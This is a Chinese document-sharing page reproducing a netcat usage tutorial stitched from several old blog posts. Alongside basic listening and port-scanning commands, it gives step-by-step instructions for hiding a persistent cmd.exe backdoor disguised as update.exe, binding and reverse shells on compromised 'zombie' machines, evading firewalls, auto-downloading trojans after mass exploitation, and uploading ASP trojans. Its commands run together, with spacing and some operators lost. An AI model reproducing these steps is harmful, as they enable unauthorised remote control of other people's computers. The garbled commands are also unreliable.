nc的使用实例.docx
- 文档编号:7205415
- 上传时间:2023-05-11
- 格式:DOCX
- 页数:12
- 大小:21.67KB
nc的使用实例.docx
《nc的使用实例.docx》由会员分享,可在线阅读,更多相关《nc的使用实例.docx(12页珍藏版)》请在冰点文库上搜索。
nc的使用实例
nc的使用实例
NC.exe为一款经典的监听工具
nc的使用实例
c:
\nc.exe-l-p4455-d-ecmd.exe可以很好的隐藏一个NetCat后门。
c:
\nc.exe-p4455-d-L-ecmd.exe这个命令可以让黑客利用NetCat重新返回系统,直到系统管理员在任务管理器中看见nc.exe在运行,从而发现这个后门,我们一样可以把它做的更加隐蔽,
c:
\movenc.exec:
\windows\system32\Drivers\update.exe
c:
\windows\systeme32\drivers\update.exe-p4455-d-L-ecmd.exe
系统管理员可能把特权附属于一些无害的程序,如update.exe等,黑客也可以隐藏命令行。
c:
\windows\systme32\drivers\update.exe
cmdline:
-l-p4455-d-L-ecmd.exe
c:
\>
nc-l-p80 监听80端口
nc-l-p80>c:
\log.dat 监听80端口,并把信息记录到log.dat中
nc-v-l-p80 监听80端口,并显示端口信息
nc-vv-l-p80监听80端口,显示更详细的端口信息
nc-l-p80-t-ecmd.exe监听本地的80端口的入站信息,同时将cmd.exe重定向到80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答。
当然这个最好用在控制的肉鸡上。
nc-vipport扫瞄某IP的某个端口
nc-v-zipport-port扫描某IP的端口到某端口
nc-v-z-uip port-port扫描某IP的某UDP端口到某UDP端口
NC详细用法2009-02-1816:
36-h查看帮助信息
-d后台模式
-eprog程序重定向,一但连接就执行[危险]
-isecs延时的间隔
-l监听模式,用于入站连接
-L监听模式,连接天闭后仍然继续监听,直到CTR+C
-nIP地址,不能用域名
-ofilm记录16进制的传输
-p[空格]端口本地端口号
-r随机本地及远程端口
-t使用Telnet交互方式
-uUDP模式
-v详细输出,用-vv将更详细
-w数字timeout延时间隔
-z将输入,输出关掉(用于扫锚时)
先讲讲一些简单的用法:
nc-nvv192.168.0.180连接到192.168.0.1主机的80端口
nc-l-p80开启本机的TCP80端口并监听
nc-nvv-w2-z192.168.0.180-1024扫锚192.168.0.1的80-1024端口
高级用法:
nc-L-p3389做蜜罐,不停地监听3389端口
nc-L-p3389>c:
\log.txt做蜜罐,不停地监听3389端口,同时把结果输出到c:
\log.txt
nc-L-p3389 \ftp.txt不停地监听3389端口,并把c: \ftp.txt中内容发给连接本端口的主 机,可起到传送文件作用.(此用法经常用于反向溢出) nc-l-p2008-t-ecmd.exe绑定主机的cmd到2008端口,并以TELNET方式应答。 nc-t-ecmd.exe192.168.0.2555绑定cmd反向连接192.168.0.2的555端口以TELNET方式应答。 组合用法: 1.溢出用: nc-L-p8989 \ftp.txt(ftp.txt中为FTP自动下载命令) 效果: 一但溢出的主机连接8989端口就会自动用FTP下载指定的文件,如木马.(此法经常用于批量溢出) 2.返回CMDSHELL用: 正向连接: 在远程主机上运行nc-l-p2008-t-ecmd.exe 本机运行nc-nvv192.168.0.12008 连接成功就会返回一个CMDshell。 (类似TELNET) 反向连接: 先在本机运行nc-l-p2008 在远程主机上运行nc-t-ecmd.exe192.168.0.22008 连接成功就会得到一个CMDshell。 (类似TELNET) 3.上传文本 本机运行nc-vv80<1.txt(此法经常用于上传ASP木马) 本机运行nc-nvv192.168.0.180<1.txt(向192.168.0.1发送1.txt中的内容) 命令1: 监听命令 nc-l-pport nc-l-pport>e: /log.dat nc-l-v-pport 参数解释: -l: 监听端口,监听入站信息 -p: 后跟本地端口号 -v: 显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息 提示: 一般大家都爱用-vv nc-l-p80 这个很简单,监听80端口 如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦! nc-l-p80>e: /log.dat 呵呵,功能和上边一样,但是后边加了个“>e: /log.dat”我想,学过ECHO 那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件 nc-l-v-p80 和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC 的屏幕上。 nc-l-v-p80 然后在浏览器中输入本机IP: 127.0.0.1 同样,上边两个也是一样,大家自己试验一下吧 命令2: 程序定向 nc-l-pport-t-ecmd.exe 本地机: nc-l-pport或nc-l-v-pport 目标机: nc-ecmd.exeipport 参数解释: -l、-p两个参数已经解释过了 -e;作用就是程序定向 -t: 以telnet的形式来应答 例子 nc-l-p5277-t-ecmd.exe 知道运行在哪里吗? 千万不要运行在自己的机器上,如果运行了,你机器 就会变成一台TELNET的服务器了,呵呵,解释一下: 监听本地端口5277的 入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以 TELNET的形式来响应连接要求。 说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。 。 呵呵,咱们来找台肉鸡试试,我TELNETIP5277 (本地主机)localmachine: nc-l-pport(ornc-l-v-pport) (远程主机)remotemachine: nc-ecmd.exeipport 大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马, 什么叫反弹端口? 就是说,当对方中马后,不用你主动和对方连接,也就是说 不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你 这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。 这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。 nc-l-p5277(监听本地5277端口) 同样也可以用 nc-l-v-p5277 运行在本地 然后在远程机器上,想办法运行 nc-ecmd.exeip5277 呵,看看在本地机器上出现了什么? 这样就是反弹~~在本地机器上得到了一个SHELL 命令3: 扫描端口 nc-vipport nc-v-zipport-port nc-v-z-uipport-port 参数解释: -z: 将输入输出关掉,在扫描时使用 nc-vipport 这个命令是针对某一个端口进行扫描 例如: nc-vip135 扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多 的信息 例如: 80端口 我们可以使用nc-vip80然后使用get方法来获得对方的WEB服务器的信息 nc-v-zipport-port 这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范 例如: nc-v-zip1-200 可以看到我机器上的1-200的TCP端口的开放情况 nc-v-z-uipport-port 这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP 端口的 例如: nc-v-z-uip1-200 这个命令就会扫1-200的UDP端口 命令4: 传送文件(HOHO,ILIKE) (本地主机)LOCALMACHINE: nc-v-nipport /hack/pulist.exe (远程主机)REMOTEMACHINE: nc-v-l-pport>c: /pulist.exe 参数解释: -n: 指定数字的IP地址 这两个命令结合起来是用来传送文件的 首先,在远程机上运行命令: nc-v-l-p5277>c: /pulist.exe 这个命令还记的吗? 呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口 并把接受到的信息数据写到c: /pulist.exe中 这时候在本地机上运行 nc-v-nip5277 /hack/pulist.exe 这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端 口上这样远程主机就会自动创建一个pulist.exe文件 NC的用法|NC教程2009-05-1610: 42nc.exe大家也非常熟悉了吧! ~之所以叫瑞士军刀,因为它的功能太多,太强大了! ~ (注: nc是一个在命令提示下用的,并是那种很人性话的图形界面软件! ~) 它的功能太强大了,我现在只能给大家介绍几种用法! ~ (1)格式: nc-nvv192.168.x.x80 讲解: 连到192.168.x.x的TCP80端口 (2)格式: nc-l-p80 讲解: 监听本机的TCP80端口 (3)格式: nc-nvv-w2-z192.168.x.x80-445 讲解: 扫描192.168.x.x的TCP80到TCP445的所有端口 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 在网络工具中有“瑞士军刀”美誉的NetCat,在我们用了N年了至今仍是爱不释手。 因为它短小精悍(这个用在它身上很适合,现在有人已经将其修改成大约10K左右,而且功能不减少)。 现在就我的一些使用心得和一些帮助文档中,做一些介绍与大家共勉。 1、了解NC的用法 命令: nc–h 技巧: win98用户可以在autoexec.bat加入path=nc的路径,win2000用户在环境变量中加入path中,linux含有这个命令(redhat) 1、基本使用 想要连接到某处: nc[-options]hostnameport[s][ports]... 绑定端口等待连接: nc-l-pport[-options][hostname][port] 参数: -eprog程序重定向,一旦连接,就执行[危险! ! ] -ggatewaysource-routinghoppoint[s],upto8 -Gnumsource-routingpointer: 4,8,12,... -h帮助信息 -isecs延时的间隔 -l监听模式,用于入站连接 -n指定数字的IP地址,不能用hostname -ofile记录16进制的传输 -pport本地端口号 -r任意指定本地及远程端口 -saddr本地源地址 -uUDP模式 -v详细输出——用两个-v可得到更详细的内容 -wsecstimeout的时间 -z将输入输出关掉——用于扫描时 其中端口号可以指定一个或者用lo-hi式的指定范围。 例如: 扫描端口 tcp扫描 C: \nc>nc-v-z-w2192.168.0.801-140 net[192.168.0.80]140(? ) net[192.168.0.80]139(netbios-ssn)open net[192.168.0.80]138(? ) net[192.168.0.80]137(netbios-ns) net[192.168.0.80]136(? ) net[192.168.0.80]135(epmap)open net[192.168.0.80]81(? )open net[192.168.0.80]80(http)open net[192.168.0.80]79(finger) net[192.168.0.80]25(smtp)open net[192.168.0.80]24(? ) net[192.168.0.80]23(telnet) net[192.168.0.80]21(ftp) udp扫描 C: \nc>nc-u-v-z-w2192.168.0.801-140 net[192.168.0.80]140(? )open net[192.168.0.80]139(? )open net[192.168.0.80]138(netbios-dgm)open net[192.168.0.80]137(netbios-ns)open net[192.168.0.80]54(? )open net[192.168.0.80]53(domain)open net[192.168.0.80]38(? )open net[192.168.0.80]37(time)open net[192.168.0.80]7(echo)open nc(黑客界的瑞士军刀)的用法2008年09月11日星期四16: 432007-12-1620: 52讲四个命令 命令1: 监听命令 nc-l-pport nc-l-pport>e: \log.dat nc-l-v-pport 参数解释: -l: 监听端口,监听入站信息 -p: 后跟本地端口号 -v: 显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息 提示: 一般大家都爱用-vv nc-l-p80 这个很简单,监听80端口 如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦! nc-l-p80>e: \log.dat 呵呵,功能和上边一样,但是后边加了个“>e: \log.dat”我想,学过ECHO 那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件 nc-l-v-p80 和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC 的屏幕上。 呵呵,讲了这么多,来实践下 nc-l-v-p80 然后在浏览器中输入本机IP: 127.0.0.1 呵呵,看到什么? 同样,上边两个也是一样,大家自己试验一下吧 命令2: 程序定向 nc-l-pport-t-ecmd.exe 本地机: nc-l-pport或nc-l-v-pport 目标机: nc-ecmd.exeipport 参数解释: -l、-p两个参数已经解释过了 -e;作用就是程序定向 -t: 以telnet的形式来应答 例子 nc-l-p5277-t-ecmd.exe 知道运行在哪里吗? 千万不要运行在自己的机器上,如果运行了,你机器 就会变成一台TELNET的服务器了,呵呵,解释一下: 监听本地端口5277的 入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。 说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。 。 (话外音: 说这么多遍当我们白痴啊,快往下讲! ! ! ) 呵呵,咱们来找台肉鸡试试,我TELNETIP5277 HOHO~~如何? localmachine: nc-l-pport(ornc-l-v-pport) remotemachine: nc-ecmd.exeipport 大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马, 什么叫反弹端口? 就是说,当对方中马后,不用你主动和对方连接,也就是说 不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你 这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。 这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。 为什么? 咳! ! 听我给你讲啊! ! (先交100000000RMB学费)哇,别杀我啊! ! ) nc-l-p5277(坚听本地5277端口) 同样也可以用 nc-l-v-p5277 运行在本地 然后在远程机器上,想办法运行 nc-ecmd.exeip5277 (你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样! ! 呵呵,看看在本地机器上出现了什么? 这样就是反弹~~在本地机器上得到了一个SHELL 命令3: 扫描端口 nc-vipport nc-v-zipport-port nc-v-z-uipport-port 参数解释: -z: 将输入输出关掉,在扫描时使用 nc-vipport 这个命令是针对某一个端口进行扫描 例如: nc-vip135 扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息 例如: 80端口 我们可以使用nc-vip80然后使用get方法来获得对方的WEB服务器的信息 nc-v-zipport-port 这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围 例如: nc-v-zip1-200 可以看到我机器上的1-200的TCP端口的开放情况 nc-v-z-uipport-port 这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的 例如: nc-v-z-uip1-200 这个命令就会扫1-200的UDP端口 命令4: 传送文件(HOHO,ILIKE) LOCALMACHINE: nc-v-nipport \svr.exe REMOTEMACHINE: nc-v-l-pport>y: \svr.exe 参数解释: -n: 指定数字的IP地址 这两个命令结合起来是用来传送文件的 首先,在远程机上运行命令: nc-v-l-p5277>c: \pulist.exe 这个命令还记的吗? 呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口 并把接受到的信息数据写到c: \pulist.exe中 这时候在本地机上运行 nc-v-nip5277 \hack\pulist.exe 这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上 这样远程主机就会自动创建一个pulist.exe文件。 。 呵呵,你想到了吗? ? 上边是NC的比较常用的方法,希望通过这些,大家能发挥自己的想象力,创造出更多更精彩的命令来, 因为NC的用法不仅仅局限于这几种而已哦! ! 对NC来说,只有想不到,没有做不到的! ! !
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- nc 使用 实例